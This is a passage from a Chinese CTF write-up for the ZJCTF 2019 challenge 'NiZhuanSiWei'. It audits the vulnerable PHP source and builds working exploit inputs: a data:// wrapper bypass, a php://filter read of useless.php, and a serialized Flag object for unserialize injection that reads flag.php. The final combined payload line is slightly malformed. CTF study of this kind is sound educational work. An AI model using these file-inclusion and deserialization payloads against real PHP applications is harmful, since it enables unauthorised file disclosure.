zoukankan      html  css  js  c++  java
  • [ZJCTF 2019]NiZhuanSiWei PHP代码审计+反序列化

    解题

      题目直接给出了源码

     <?php  
    $text = $_GET["text"];
    $file = $_GET["file"];
    $password = $_GET["password"];
    if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
        echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
        if(preg_match("/flag/",$file)){
            echo "Not now!";
            exit(); 
        }else{
            include($file);  //useless.php
            $password = unserialize($password);
            echo $password;
        }
    }
    else{
        highlight_file(__FILE__);
    }
    ?> 

      简单浏览一下,是个PHP反序列化和几个绕过,可以利用伪协议

      第一个绕过

    if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
        echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";

      $text要==="welcome to the zjctf" ,这个好绕,利用data://

    text=data://text/plain,welcome to the zjctf

      第二个绕过

     if(preg_match("/flag/",$file)){
         echo "Not now!";
         exit(); 
     }else{
         include($file);  //useless.php
         $password = unserialize($password);
         echo $password;
      } 

      这里有个userless.php,因为没有过滤,所以就想到了 php://filter/read=convert.base64-encode/resource=

    file=php://filter/read=convert.base64-encode/resource=useless.php

      这里要结合第一个绕过

    ?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

      base64解码后

    <?php  
    
    class Flag{  //flag.php  
        public $file;  
        public function __tostring(){  
            if(isset($this->file)){  
                echo file_get_contents($this->file); 
                echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
            }  
        }  
    }  
    ?>  

      第三个绕过

    $password = $_GET["password"];
    include($file);  //useless.php
    $password = unserialize($password);
    echo $password;

      这是反序列化,结合刚刚的flag.php内容,本地构造一下

    <?php  
    class Flag{  //flag.php  
        public $file="flag.php";  
        public function __tostring(){  
            if(isset($this->file)){  
                echo file_get_contents($this->file); 
                echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
            }  
        }  
    }  
    $a = new Flag();
    echo serialize($a);
    ?>
    password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

     最后的exp

    ?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode&password=password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

      查看源码

  • 相关阅读:
    B. Gerald is into Art
    day 56 Django介绍
    day 55 bootstrap应用
    Python学习之变量的作用域
    day 54 JQ用法
    day 53 BOM与DOM
    day 52 js语法
    day 51 label标签,文字属性,背景属性,边框,display属性,盒模型,浮动,overflow,定位,z-index和模态框
    day 50 form表单,input框,textarea,select,css的引入方式,标签嵌套,选择器,宽高属性,字体属性
    day 49 html标签介绍,标题、段落、a、img、表格、特殊符号、常用标签、div、span
  • 原文地址:https://www.cnblogs.com/Lee-404/p/12836238.html
Copyright © 2011-2022 走看看